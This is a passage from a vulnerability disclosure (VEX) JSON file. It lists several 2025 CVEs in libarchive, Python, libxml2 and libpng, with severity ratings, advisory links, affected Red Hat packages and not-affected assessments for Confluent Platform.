          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        404,
        476
      ],
      "description": "A vulnerability was found in libarchive up to 3.7.7. It has been classified as problematic. This affects the function list of the file bsdunzip.c. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1632"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1632"
        },
        {
          "url": "https://github.com/Ekkosun/pocs/blob/main/bsdunzip-poc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1632"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7454-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.296619"
        },
        {
          "url": "https://vuldb.com/?id.296619"
        },
        {
          "url": "https://vuldb.com/?submit.496460"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1632"
        }
      ],
      "published": "2025-02-24T14:15:11+00:00",
      "updated": "2026-06-17T08:39:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1795",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        116
      ],
      "description": "During an address list folding when a separating comma ends up on a folded line and that line is to be unicode-encoded then the separator itself is also unicode-encoded. Expected behavior is that the separating comma remains a plan comma. This can result in the address header being misinterpreted by some mail servers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1795"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1795"
        },
        {
          "url": "https://github.com/python/cpython/commit/09fab93c3d857496c0bd162797fab816c311ee48"
        },
        {
          "url": "https://github.com/python/cpython/commit/70754d21c288535e86070ca7a6e90dcb670b8593"
        },
        {
          "url": "https://github.com/python/cpython/commit/9148b77e0af91cdacaa7fe3dfac09635c3fe9a74"
        },
        {
          "url": "https://github.com/python/cpython/commit/a4ef689ce670684ec132204b1cd03720c8e0a03d"
        },
        {
          "url": "https://github.com/python/cpython/commit/d4df3c55e4c5513947f907f24766b34d2ae8c090"
        },
        {
          "url": "https://github.com/python/cpython/issues/100884"
        },
        {
          "url": "https://github.com/python/cpython/pull/100885"
        },
        {
          "url": "https://github.com/python/cpython/pull/119099"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00013.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/MB62IZMEC3UM6SGHP5LET5JX2Y7H4ZUR/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1795"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
        }
      ],
      "published": "2025-02-28T19:15:36+00:00",
      "updated": "2026-07-31T14:16:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-27113",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a NULL pointer dereference in xmlPatMatch in pattern.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-27113"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/12"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/13"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/4"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/5"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/8"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-27113"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/861"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27113"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250306-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7302-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-27113"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/02/18/2"
        }
      ],
      "published": "2025-02-18T23:15:10+00:00",
      "updated": "2026-06-17T09:03:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-28164",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        401,
        120
      ],
      "description": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-28164"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-28164"
        },
        {
          "url": "https://gist.github.com/kittener/506516f8c22178005b4379c8b2a7de20"
        },
        {
          "url": "https://github.com/pnggroup/libpng/issues/655"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/657"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-28164"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7993-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-28164"
        }
      ],
      "published": "2026-01-27T16:16:14+00:00",
      "updated": "2026-06-17T09:04:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
